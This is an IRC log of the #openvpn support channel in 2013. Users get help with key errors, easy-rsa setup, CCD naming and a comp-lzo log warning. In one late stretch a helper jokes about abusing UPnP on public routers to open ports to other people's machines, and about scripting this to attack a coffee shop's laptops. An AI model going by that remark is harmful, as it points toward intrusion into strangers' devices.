[~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 17:20 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 17:52 < LifeIsPain> Is there a method of checking why the private key isn't loaded based off of the error message more specifically? : Cannot load private key file /path/to/openvpn/key.pem: error:0B080074:lib(11):func(128):reason(116) Error: private key password verification failed 17:53 < LifeIsPain> issue being that there isn't a key password 17:55 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 18:18 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 18:25 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 256 seconds] 18:34 -!- brute11k1 [~brute11k@89.249.230.159] has joined #openvpn 18:34 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 264 seconds] 18:51 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 18:59 -!- catsup [~d@64.111.123.163] has joined #openvpn 19:01 -!- b1rkh0ff [~b1rkh0ff@178.77.27.113] has quit [Ping timeout: 240 seconds] 19:04 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 248 seconds] 19:10 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 20:04 -!- Changos [~Changos@unaffiliated/changos] has joined #openvpn 20:33 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 252 seconds] 20:49 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 20:52 -!- baobeiiii [~baobeiiii@180.155.14.35] has joined #openvpn 20:52 < baobeiiii> client stuck in management:wait 20:57 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 21:01 < kisom> baobeiiii: OK, I'll note that down :) 21:02 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 21:05 -!- SpeedingBus [~root@216.17.109.26] has joined #openvpn 21:14 -!- SpeedingBus [~root@216.17.109.26] has quit [] 21:15 -!- SpeedingBus [~root@5.231.5.192] has joined #openvpn 21:24 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 21:25 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 21:25 -!- SpeedingBus [~root@5.231.5.192] has quit [Ping timeout: 248 seconds] 21:28 -!- SpeedingBus [~root@5.231.5.192] has joined #openvpn 21:29 < baobeiiii> can't ping the server but its up 21:30 < baobeiiii> i guess ip is blocked 21:31 < SpeedingBus> what ip is it? 21:38 < baobeiiii> 192.73.252.241 21:38 < baobeiiii> no ssh or ping from here 21:39 < baobeiiii> had two servers, both ip's seem blocked 21:41 < baobeiiii> if its the case just hopeing it was auto blocked by chinese firewall and not some guy intent on ruining my day 21:45 < SpeedingBus> I can ping that ip 21:45 < SpeedingBus> isn't that good news 21:45 < baobeiiii> i just reprovisioned my server to a new cloud 21:45 < baobeiiii> similar ip but different, can now ssh 21:45 < baobeiiii> normally i use the openvpn snapshot repo but i can't find a link for it without vpn lol 21:47 < SpeedingBus> are you from China? 21:47 < baobeiiii> Shanghai 21:47 < SpeedingBus> the firewall there sounds scarry 21:48 < baobeiiii> basically i need to wget http://openvpn snapshot for centos/redhat 21:48 < baobeiiii> then rpm -Uvh the above 21:49 < SpeedingBus> I think most of us use wget to get openvpn 21:49 < baobeiiii> this would be the first time i've had the entire ip blocked, perhaps they blocked a subnet 21:49 < SpeedingBus> I mean, that's the fastest way 21:49 < SpeedingBus> yeah, definitely sounds scarry 21:49 < SpeedingBus> I can't imagine living in shanghai without internet! 21:50 < baobeiiii> its one of the better places, at least we have fibre here 21:50 < baobeiiii> but a huge pita without vpn 21:51 < baobeiiii> constant connection resets on google and a ton of websites 21:51 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 21:51 < baobeiiii> could you pleaseeee google 'openvpn repo' then the first link click, copy paste the download link for the redhat repo 21:52 < baobeiiii> then i'll be back on my feet :) 21:52 -!- brute11k1 [~brute11k@89.249.230.159] has quit [Ping timeout: 256 seconds] 21:54 < SpeedingBus> https://community.openvpn.net/openvpn/wiki/OpenvpnSoftwareRepos 21:54 <@vpnHelper> Title: OpenvpnSoftwareRepos – OpenVPN Community (at community.openvpn.net) 21:55 < baobeiiii> yea that's the link, but blocked here 21:56 < baobeiiii> once in there, there's normally a list of OS, just need the redhat one 21:56 < SpeedingBus> i hope pastebin isn't blocked 21:56 < SpeedingBus> http://pastebin.com/bs5kFv0F 21:56 < SpeedingBus> there you go 21:57 < baobeiiii> pastebin is lol 21:58 -!- rych [~root@5.231.5.192] has joined #openvpn 21:59 < rych> http://repos.openvpn.net/repos/yum/conf/repos.openvpn.net-CentOS6-snapshots.repo 22:01 < baobeiiii> thanks! 22:01 -!- SpeedingBus [~root@5.231.5.192] has quit [Ping timeout: 248 seconds] 22:01 -!- rych is now known as SpeedingBus 22:01 < SpeedingBus> np 22:03 < baobeiiii> got it installed 22:03 < SpeedingBus> that was fast 22:04 < SpeedingBus> do you own sanjose.com? 22:04 < baobeiiii> once u add the repo just yum install openvpn 22:04 < baobeiiii> yea 22:05 < baobeiiii> damn easy-rsa isn't bundled with 2.3 22:06 < SpeedingBus> lol 22:06 < SpeedingBus> It would be a hell lot easier if you just use debian 22:06 < SpeedingBus> installing it is just a matter of apt-get openvpn 22:06 < SpeedingBus> with everything 22:07 < baobeiiii> debian use the new release? 22:07 < SpeedingBus> hmm maybe not 22:07 < SpeedingBus> i think it uses 2.2 22:07 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] 22:07 < pekster> 2.2. should be fine unless you need the IPv6 or other recent features 22:08 < baobeiiii> well i've got the server up and openvpn 2.3 installed, just need a kind soul to give me a link to download easy-rsa 22:10 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 22:10 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 22:12 < SpeedingBus> you mean there is no easy-rsa folder under openvpn? 22:13 < pekster> The Unix/Linux project split it off into a separate functional project, since they're not really realted (but useful together) 22:14 < pekster> Here's the latest official project download: the master should be fine to use: https://github.com/OpenVPN/easy-rsa/archive/master.zip 22:14 < pekster> Well, latest cocde download 22:14 < SpeedingBus> nice 22:14 < pekster> Not the official release, but that includes some improvements anyway to the security (using sha256, and 2048 keysizes) 22:14 < baobeiiii> thanks 22:14 < baobeiiii> i always change to 2048 22:15 < baobeiiii> sha256 will add a bit of overhead 22:15 < pekster> Not really 22:15 < pekster> It's the X509 signature alg, so it's only used for the control channel stuff 22:17 < pekster> baobeiiii: Oh, that might actually need some adjustment since it won't flawlessly work until "built" due to some references in the vars file :\ 22:18 < baobeiiii> u mean if i dont use sha? 22:18 < pekster> Oh, nevermind, I was mistaken; it'll work fine (I missed a script that makes it all work) 22:18 < pekster> Just cd into the 2.0 folder under easy-rsa and you should be set 22:19 < pekster> That zip is the upstream source, so it includes the "old" 1.0 and Windows versions too, but it's more recent and includes a fix I wrote to improve the security in line with recent standards improvements (thus making it more secure) 22:20 < baobeiiii> so i just use the 2.0 dir one 22:21 < pekster> Yea 22:21 < baobeiiii> ah thats cool that you worked on it 22:21 < SpeedingBus> pekster: how do one use the client dnat directive in openvpn 2.3? 22:22 < pekster> I'm trying to pretend that option doesn't exist... 22:22 < pekster> It's an awful hack 22:22 < SpeedingBus> how is it awful? You mean it's broken? 22:23 < SpeedingBus> doesn't work etc etc? 22:23 < pekster> No, as in it's something you shouldn't ever have to do 22:23 < baobeiiii> ah you left the fields in there 22:23 < baobeiiii> should remove them ;) 22:23 < pekster> It "works" as much as any convulted network remap NAT hack does 22:23 < baobeiiii> country, email etc 22:23 < pekster> baobeiiii: That's on my todo list 22:23 < baobeiiii> just deleting them doesnt work? 22:23 < pekster> For now, just type the '.' character to not include them in your certs 22:24 < baobeiiii> "." for each, cool 22:24 < pekster> Just the CN is needed 22:24 < pekster> None of that email, country, state, province, etc crap 22:25 < pekster> I use a different set of scripts that better meet my needs, but the effect if you leave them out is like this: http://fpaste.org/GbdX/ 22:27 < pekster> SpeedingBus: Those "nathack" options are for transparently re-writing networks to use the same numbered networks on either side of a VPN connection, while pretend to the local side that the remote "duplicate" network is accessible on a faked equivilent network. One can do hackary like that in iptables/ipf too, but now it's a "helpful" option. It's still a really ugly NAT hack that you should fix by properly numbering networks 22:28 < pekster> If that got cut off, "... It's still a really ugly NAT hack that you should fix by properly numbering networks" 22:28 < baobeiiii> edited vars using "." 22:29 < baobeiiii> making the ca it says 'country name too short, needs to be 2 bytes long' 22:29 < pekster> Yea, don't do that 22:29 < pekster> The . is for interactive usage 22:30 < pekster> At least I thought you could leave it out... 22:33 < pekster> Yea, it does 22:34 < baobeiiii> works 22:34 < baobeiiii> just by typing . 22:34 < baobeiiii> thx 22:34 < baobeiiii> what did u type to view the info as in that paste? 22:35 < pekster> openssl x509 -in file.crt -noout -text 22:35 < pekster> It's just showing you the "printable" format of the cert file 22:40 < baobeiiii> what was the command to make ta.key 22:40 < baobeiiii> last part then i should be able to connect 22:42 < pekster> openvpn --genkey --secret secret.key 22:43 < pekster> or ta.key, call it w/e 22:45 < baobeiiii> cheers 22:45 < baobeiiii> if u get around to tinkering with easy-rsa again, please have it make the key files 0400 22:45 < baobeiiii> just one less step ;) 22:46 < Changos> pekster: I have same problem :s 22:49 < Changos> just now I check with tcpdump on both sites, I test with ping from some PC on server site to some PC on client site. And server site packages going to tunnel VPN. But the other end (client) with tcpdump don't see anything 22:49 < Changos> vice versa is ok 22:49 < Changos> I check my firewall, and I've all input and output traffic on tun0 is clear on client site 22:53 < Changos> I check again my route table and is all fine 22:55 < Changos> I don't know, but some page was saying that this configuration only work with static key, and not with certificates. This is true ?, I don't think so 23:00 -!- Devastator- [~devas@186.214.110.24] has joined #openvpn 23:01 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 245 seconds] 23:11 < pekster> Changos: Is the target of your ping the VPN client, or a PC on a LAN behind the VPN client? 23:18 < Changos> ping from any PC on server to VPN Client target successfull, ping fron any PC on server to Ethernet LAN or any PC on LAN on client unsuccessfull 23:18 < Changos> pekster: ---^ 23:21 < pekster> Can you pastebin your server config, client config, and server ccd file for the client? 23:22 < Changos> sure 23:26 < Changos> pekster: http://pastebin.ca/2314911 23:29 < pekster> Changos: Is the client CN 'client1' and not 'client01' ? 23:31 < pekster> In other words, if you do this command on the client, you should see the text "CN=client1" in the output: openssl x509 -in client01.vdcoop.co.key -noout -text | grep Subject 23:34 < baobeiiii> hmm can't start up openvpn service 23:34 < baobeiiii> failed 23:34 < baobeiiii> done it so many times, haven't missed anything 23:35 -!- Orbi [~opera@109.129.3.224] has joined #openvpn 23:35 -!- Orbi [~opera@109.129.3.224] has left #openvpn [] 23:35 < baobeiiii> openvpn.log says cannot openvpn tun/tap dev no such device 23:36 < pekster> Missing kernel tun support most likely, or you've specified a specific named device that doesn't exist 23:37 < Changos> pekster: CN=client01/name=changeme/emailAddress= 23:37 < pekster> Changos: That's your problem them. The ccd file must *exactly* match the client CN. So, your file must be named client01, not client1 23:37 < Changos> baobeiiii: compile kernel with support to tun/tap 23:41 < Changos> pekster: seriously ?, damn, ok, I change it 23:41 < Changos> and working ! 23:41 < Changos> -_- fucking stupid error 23:41 < Changos> pekster: thanks you very much :D 23:41 < pekster> You'll also save IPs if you use the 'topology subnet', although with just 2 devices, you can continue to use net30 like you are on a /29 23:42 < LifeIsPain> pekster: well, I have it all running, figured out a fair amount, and part of it was user error, part of it was dd-wrt allowing for the user error and not complaining at any point, and some of it was oddity in dd-wrt I had to figure out a way around 23:42 < pekster> However, you can't connect another client since you're out of IPs now :) 23:42 < LifeIsPain> thanks much for the pointers ~23 hours ago and on 23:43 < pekster> LifeIsPain: Yea, embedded devices tend to abstract and hide things behind layers and layers of UI and scripts 23:43 < pekster> Great if the magic pixie dust does what you want, but not so great if you need to learn how it works with no prior development work on that project 23:43 < LifeIsPain> which is all fine and dandy if it just actually works 23:44 < LifeIsPain> pretty much, trying to figure out around the oddities they introduce 23:44 < pekster> OpenWRT has the same kind of setup, with the end-goal of "easy setup" in a web page. I trashed that whole setup and just wrote my own init shell script to do exactly what I wanted 23:45 < LifeIsPain> you get more control if you do that, yep 23:46 < baobeiiii> k sent my provider a ticket 23:46 < baobeiiii> its virtualised so can't load modules myself 23:46 < LifeIsPain> only issue I ran into after wards is I went to a heavily firewalled location to try and connect, first it didn't think I was in the right subnet, then once I was, it was using the site's DNS which was not accessible 23:47 < baobeiiii> pekster, noticed in my log that it's using SHA1, wasn't that easy-rsa supposed to use SHA2 by default? 23:47 < LifeIsPain> but any who, thanks much, I'll stick around for a bit, possibly field some answers, shouldn't screw anything up too much while doing so ;) 23:47 < Changos> pekster: yeah, I know, I configure the subnet purposely ;) 23:51 < Changos> Is incredible that I try fixed the problem for aprox 40 hours and finally were the file name. Any place on Internet when I reading see anything about it -_- ! 23:55 < pekster> baobeiiii: SHA1 for what, the X509 cert? By default openvpn still uses SHA1 as the HMAC unless you change it with the --alg directive 23:55 < pekster> The X509 signature method is separate from the HMAC on the data channel 23:56 < baobeiiii> was looking at hmac 23:56 < pekster> Yea, that defaults to SHA1 still unless you override it 23:56 < baobeiiii> alg SHA2 in server right 23:56 < baobeiiii> auth rather 23:56 < pekster> Yup, that's it 23:56 < pekster> SHA256 23:57 < pekster> See: openvpn --show-digests 23:57 < pekster> You can use SHA512, but the method doesn't really offer any better protection, and takes twice as much room in each packet (so I think it's a waste) 23:58 < baobeiiii> as i know sha1 is a bit weak 23:58 < baobeiiii> ill just use sha256 23:58 -!- vraa__ [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 23:59 < pekster> The chances it'll make a difference is really low, but there's no reason not to migrate to sha2 unless it's actually not supported on one of your devices (and I'd be very surprised to see that on any modern system made in the last decade or so) --- Day changed Mon Feb 18 2013 00:01 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 00:16 -!- brute11k1 [~brute11k@89.249.230.159] has joined #openvpn 00:17 < matsh> pekster: Still here? 00:17 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 245 seconds] 00:28 < pekster> matsh: Looking back at your pastebin link, your server is configured to require a certificate with the "server" attribute in the ns-cert-type field. You probably don't want this 00:29 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 00:29 < pekster> Remove that, or use ns-cert-type client instead 00:29 < pekster> ie: the server checks that it gets a *client* cert, and the client checks that it gets a *server* cet 00:30 < SpeedingBus> pekster, how do i set dmz to my internal lan? 00:30 -!- brute11k1 [~brute11k@89.249.230.159] has quit [Ping timeout: 248 seconds] 00:36 < pekster> huh? OpenVPN has no concept of "DMZ" or "LAN" 00:37 < baobeiiii> networking channel 00:37 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 248 seconds] 00:38 < EugeneKay> The concept of a "LAN DMZ" is the most annoying thing to develop in home networking parlance since 192.168.1.x 00:38 < SpeedingBus> yeah, i was asking if i am using this on a linux system, what sort of settings/configuration do i need to set in iptables to have my internal ips, eg 10.8.x.x to be dmz by default 00:39 < pekster> Describe what you want; don't use a buzword like "DMZ" since that means a completely different thing to me than I'm sure you mean 00:40 < SpeedingBus> ok, eg i have a vps which i have openvpn setup 00:40 < EugeneKay> When you say "DMZ" I imagine the space between the north and south korean armies 00:40 < SpeedingBus> EugeneKay: lol no 00:40 < SpeedingBus> lulz 00:40 < SpeedingBus> okay i have openvpn setup on my vps 00:41 < SpeedingBus> and i want to host a shoutcast from my pc(instead of the vps) 00:42 < SpeedingBus> now i was told that i need to open/forward certain ports for it to work 00:42 < SpeedingBus> so i did and that worked great 00:42 < SpeedingBus> but i was wondering if it is possible to have dmz(regardless of what port i want to use, instead of specifying a specific port in iptables) 00:43 < SpeedingBus> i can do it on openvpn-as 00:43 < SpeedingBus> but i was wondering if it can be done on openvpn instead 00:43 < SpeedingBus> *too 00:44 < EugeneKay> I'm assuming that by "DMZ" you mean "forward traffic for arbitrary ports to a client" 00:44 < EugeneKay> (please, stop using that word) 00:44 < SpeedingBus> yeah 00:45 < SpeedingBus> if i need to open a specific port, i need to set it in iptables 00:45 < EugeneKay> UPnP is one of several ways this can be done 00:45 < SpeedingBus> urgh..how do i set upnp? 00:45 < SpeedingBus> is that iptables? 00:45 < EugeneKay> Dark magic and unicorn sacrifice 00:45 < SpeedingBus> fuck i'll do it. 00:46 * SpeedingBus sacrifices a unicorn 00:46 < SpeedingBus> there 00:46 < SpeedingBus> teach me 00:46 < EugeneKay> I've never done it :-p 00:46 < EugeneKay> Try googling for 'linux upnp' 00:46 < SpeedingBus> damit Eugene. I want my unicorn back 00:46 < pekster> uPnP is a pain, but it's great fun to abuse on routers that leave it on at wifi cafes to punch a quick port for myself 00:47 < pekster> You're far better off blindly forwarding everything through iptables to your "special" client, or doing it dynamically when it connects by way of a client-connect script 00:47 < pekster> Optionally, give it a static IP and blindly DNAT to that static IP (that should be outside of your pool range) 00:49 < SpeedingBus> I've done it by assigning static ip but i want all ports to be "opened", eg: a "dmz" 00:49 < SpeedingBus> how do i set that? 00:50 < EugeneKay> !iptables 00:50 <@vpnHelper> "iptables" is (#1) to test if iptables is your problem, disable all rules or put the defaults to accept: iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -F; iptables -Z or (#2) please see http://openvpn.net/man#lbBD for more info or (#3) you can see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for pf or iptables or (#4) These is just 00:50 <@vpnHelper> the basics to get OpenVPN working. Proper firewall design is beyond the scope of this channel. You can try #iptables 00:50 < EugeneKay> See #4 ;-) 00:52 < pekster> That needs to be updated to #netfilter. Last I checked, the bot still thinks I'm scum 00:52 < pekster> !forget iptables 4 00:52 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 00:53 -!- mode/#openvpn [+o pekster] by ChanServ 00:53 <@pekster> !forget iptables 4 00:53 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 00:53 -!- mode/#openvpn [-o pekster] by ChanServ 01:07 -!- baobeiiii [~baobeiiii@180.155.14.35] has quit [Quit: Leaving] 01:14 < SpeedingBus> You should go back to #openvpn and tell them your server is pushing a 0/0 route and you don't want it to 01:14 < SpeedingBus> anyone know how do i remove 0/0? 01:20 -!- SpeedingBus is now known as BusIsSpeeding 01:26 < matsh> I don't know if there is such an equivalent for Linux, but in FreeBSD I use miniupnpd on routers. 01:27 < pekster> I've got that in my Linux distro 01:27 < pekster> upnp is really overkill here 01:27 < matsh> I didn't really read the whole conversation, just noticed some talk about upnp :) 01:30 < pekster> I had fun playing with some tools on backtrack to (ab)use some routers. I even was able to punch holes in the NAT/forwarding on a router that's used on my LAN as an AP-only. I found i could open a port for a *differnet* LAN IP besides my own, heh 01:31 < pekster> upnp tends to be really badly implemented and full of attack vectors :( 01:33 < matsh> Heh, that's not good 01:34 < matsh> How? By code injection? 01:34 -!- BusIsSpeeding is now known as jaws 01:34 < pekster> No. Simply by asking it to open the port ;) 01:34 < pekster> Some run-of-the-mill home router, and it specifically takes the target LAN IP in the command 01:35 < matsh> So instead of determining IP by itself, it asks for an IP to forward the port to? 01:35 < pekster> Yup 01:37 < matsh> Werd. 01:37 < pekster> I'd be trivial to write a script to open, say, tcp/135 and similar to an entire coffee shop, for instance 01:37 < pekster> Then leave and happily attack all the unprotected laptops remotely 01:37 < pekster> It'd* 01:39 < matsh> Too easy 02:05 -!- rrva [unknown@y.mima.x.se] has quit [Quit: Lost terminal] 02:15 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 02:29 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 02:46 -!- jaws [~root@5.231.5.192] has quit [] 02:53 -!- peter_lee [~chatzilla@adsl-69-209-207-187.dsl.chcgil.sbcglobal.net] has joined #openvpn 02:53 < peter_lee> Hey is VPN platform independent or dependent? 02:54 -!- Changos [~Changos@unaffiliated/changos] has quit [Ping timeout: 244 seconds] 02:54 < pekster> OpenVPN is platform independent in the sense that is has been ported to a wide variety of systems including Linux/Unix, Mac, Windows, iOS, Android, and probably others 02:55 < pekster> Well, "ported" is less the term as most of the code is platform independent, but portions are the official source are written to handle each platform's quirks 02:55 < peter_lee> So for example, let's say I have a dual boot laptop with 2 operating systems: Linux & Windows. If I install VPN on Linux will it work on Windows automatically? 02:56 < pekster> The config is portable. The binaries are of course not 02:56 < peter_lee> So I'd have to manually install it on Windows? 02:56 < pekster> Yes. Windows cannot read ELF binaries 02:56 < peter_lee> oh interesting, thanks 02:57 -!- peter_lee [~chatzilla@adsl-69-209-207-187.dsl.chcgil.sbcglobal.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 15.0.1/20120905151427]] 03:02 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 03:20 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:22 -!- zz_AsadH is now known as AsadH 03:34 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Read error: Connection reset by peer] 03:35 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 03:35 -!- mode/#openvpn [+o vpnHelper] by ChanServ 03:37 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:46 -!- baobeiiii [~baobeiiii@180.155.14.35] has joined #openvpn 03:47 < baobeiiii> vpn finally up again! :) 03:47 < baobeiiii> thanks for help everyone 03:54 < pekster> You might want to save your configs this time 03:55 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 252 seconds] 03:56 < baobeiiii> pekster, certainly will 03:57 < baobeiiii> even saved all the direct download links 03:57 < pekster> You can probably also use "links" or similar as a console-based web browser on a console-only server 03:57 < pekster> ie: browse the web from the VPS outside the censorship 03:58 < baobeiiii> only unusual item in my logs is 03:58 < baobeiiii> Mon Feb 18 04:54:46 2013 IP packet with unknown IP version=15 seen 03:58 < baobeiiii> repeated often, other than that working fantastically 03:58 < pekster> Using tap? 03:58 < baobeiiii> tun 03:59 < pekster> Interesting. THat's on the server logs? 03:59 < baobeiiii> yea 04:00 < baobeiiii> now i can use pastebin again too :) http://pastebin.com/jLDqLqPa 04:08 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 04:08 < pekster> Ah, okay. Now that I dig further I see how that could end up as an error in tun mode too 04:09 < pekster> It's a little strange, because it means the endpoint peer sent something marked with an IP version "15" when only 4 and 6 (for IPv4 and IPv6) are supported 04:09 < pekster> But, it doesn't hurt anything; it's just a warning that it's dropping the packet 04:20 < baobeiiii> as long as it's not a security risk etc then i can live with it 04:22 < pekster> No security problem since it passed the authentication checks. An attacker would have to posess the client's private key (or somehow magically continue to get every static key that's geneated hourly) in order to forge that 04:22 < pekster> Failed packets get flagged to with a message like 'decryption failed' or similar 04:25 -!- dazo [~dazo@openvpn/community/developer/dazo] has joined #openvpn 04:25 -!- mode/#openvpn [+o dazo] by ChanServ 04:28 < pekster> The other thing I'm noting is that message occurs nearly a minute before the client actually connected 04:32 < baobeiiii> ah 04:33 < baobeiiii> i'm sure very few have ever seen decryption failed lol 04:33 < baobeiiii> we're all super careful but in reality it doesnt happen 04:33 < baobeiiii> that log shows two different clients connecting (me and bro) 04:34 < pekster> Right, but line 23-24 occurs before any client is connected 04:35 < pekster> It's possible that's geneated from a locally-created packet, ie: something the server itself is sending (maybe some self-test network daemon thing) 04:35 < pekster> No idea why it gets "IP version=15" though 04:36 < baobeiiii> maybe one day there will be ip15 lol then it wont be an error 04:36 < pekster> It will be if the code doesn't support it 04:37 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn 04:37 < pekster> http://fpaste.org/juht/ (from mroute.c) 04:38 < pekster> It's just looking at a hard-coded value in the beginning of the raw packet 04:42 < baobeiiii> pretty quiet in here today 04:42 < pekster> Mon Feb 18 04:42:41 CST 2013 04:43 < pekster> I'm one of these weird people that look at source code at 4AM 04:45 < pekster> The only useful reference I see online is an lzo missmatch between hosts that might cause that 04:45 < pekster> ie: the 'comp-lzo' value in the configs 04:47 -!- HyperGlide [~HyperGlid@110.185.147.126] has joined #openvpn 04:48 -!- HyperGlide [~HyperGlid@110.185.147.126] has quit [Remote host closed the connection] 04:49 < baobeiiii> i've never looked at the source code, looks like c? 04:50 < pekster> Almost all of OpenVPN is in C 04:51 < baobeiiii> or c++ 04:51 <@dazo> C 04:51 < pekster> I started by simply running part of that error message through group, which brought me to that function in mroute.c. I then grepped again for things that called that function to learn how packets get sent there 04:51 < pekster> through grep* 04:52 < pekster> My conclusion is that beyond the web-searchable instance where mis-matched lzo settings caused that error, it "shouldn't" happen. Obviously something is causing it, but without further debugging it's hard to say what 04:53 < pekster> Higher debug levels spit developer-level debug info to the log, but unless you were actually going to try and solve the underlying issue, it's not worth it 04:53 <@dazo> when --comp-lzo is 'adaptive' or 'yes' ... the wire-protocol slightly changes, telling the remote side if this has been compressed or not ... if you have --comp-lzo 'no' (or undefined) on one side and --comp-lzo 'yes' or 'adaptive' on the other side, it will fail 04:54 < pekster> Right. I found this reference on the 'IP version=15' error: http://forum.pfsense.org/index.php/topic,47156.msg247980.html#msg247980 04:54 <@vpnHelper> Title: INFO: OpenVPN between TP-LINK TL-WR1043ND (Client) and pfSense 2.0.1 (Server) (at forum.pfsense.org) 04:55 < pekster> Grante that appears to be running much older versions 04:55 <@dazo> yupp ... that's because the wire-protocol is different due to --comp-lzo being used on one side 04:55 < pekster> Yea, and I looked up the OPENVPN_IPH_GET_VER() inline function #define, so it's just treating the bits as the version when it could be compressed "junk" 04:56 <@dazo> correct 04:56 < pekster> Some other IRC log reference had the same issue, but claimed to have ruled out comp-lzo issues. I didn't see a resolution, so no clue how that turned out 04:57 < pekster> baobeiiii: Did you verify your use (or lack) of the 'comp-lzo' directive matches on both your client & server? 04:57 <@dazo> I think they face-palmed when they realised it was comp-lzo issues ... and were too ashamed to admit it publicly ;-) 04:57 <@dazo> also remember .... comp-lzo may be pushed 04:57 < pekster> Well, screw saving face, people like me search this crap weeks/years later! :P 04:57 <@dazo> yeah :) 04:58 <@dazo> (but pushed comp-lzo requires some kind of "comp-lzo" preparations on both sides, iirc) 04:58 < pekster> I do like having code available. I was on Windows yesterday, and couldn't get an accurate modern list of exit codes from defrag.exe. I would just open the source, except... :x 04:58 <@dazo> heh :) 04:58 < pekster> Some obscure issue with openvpn? No problem, just dive right in a 4 terminals full of code later, the reason is revealed 05:00 < baobeiiii> i've got comp-lzo specified on both sides, maybe just a harmless bug 05:00 < baobeiiii> impressive u can dig up that much on it though 05:01 < pekster> Is it the *same* on both sides? And be mindful that a 'push' from the sever may over-ride the client if the 'client' or 'pull' line occurs after 05:02 < baobeiiii> ill just double check 05:02 < pekster> Personally, I like pushing my comp-lzo setting from the server to insure I have control over the setting without needing to update client configs; it's also possible to use different comp-lzo settings on a per-client basis through ccd files or --client-connect scripts, but that's somewhat advanced 05:04 < baobeiiii> http://pastebin.com/ZsdP0enZ 05:04 < baobeiiii> can't see anything amiss 05:04 < baobeiiii> both server and client running 2.3 05:05 < baobeiiii> that ip 15 thing is spamming my logs though lol 05:06 < pekster> Yea, looks fine. My conclusion above still stands that you "shouldn't" be seeing that error 05:06 < baobeiiii> like 50% of the log is just that error 05:06 < baobeiiii> i noticed it happens every 60 seconds 05:06 < pekster> Yup, I saw that too 05:06 < baobeiiii> down to the second almost 05:07 < baobeiiii> maybe verb 1 or 2 will hide it 05:07 < pekster> I also noted above it happened initially before the client even connected, so it's possible it's some server-side network monitoring crap generating something, but that doesn't explain to me how openvpn gets a bogus value out of that packet buffer header 05:09 < baobeiiii> another guy exactly same 05:09 < baobeiiii> http://nerdanswer.com/answer.php?q=7880 05:09 <@vpnHelper> Title: OpenVPN Logs "IP Packet with unknown IP version=15" (at nerdanswer.com) 05:10 < pekster> The solution on the ubuntu site is worthless 05:16 -!- Devastator- [~devas@186.214.110.24] has quit [Changing host] 05:16 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 05:17 -!- Devastator- [~devas@unaffiliated/devastator] has quit [] 05:18 -!- b1rkh0ff [~b1rkh0ff@178.77.7.9] has joined #openvpn 05:19 < pekster> I'm not sure exactly, but you could try disconnecting both clients, start the server up with 'verb 6' and let it run for a few minutes to see if you get that same error as before with no clients on 05:19 < pekster> verb 6 might print packet-level details about the actual tun write, but I'm not sure if verb 6 actually dumps everything that would be interesting about the event. verb 7 dumps things like keys too, so that's a potential security problem 05:22 < pekster> mattock: Sorry I missed your pre-release notice on build I004; looks good as far as the tap batch scripts go, so thanks for re-rolling that 06:00 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 245 seconds] 06:03 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn 06:34 -!- eres [~rs@onyon.net] has joined #openvpn 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds] 06:49 <@dazo> !search wrt 06:49 <@vpnHelper> There were no matching configuration variables. 06:49 <@dazo> !factoids search wrt 06:49 <@vpnHelper> No keys matched that query. 06:51 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 06:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:03 -!- master_of_master 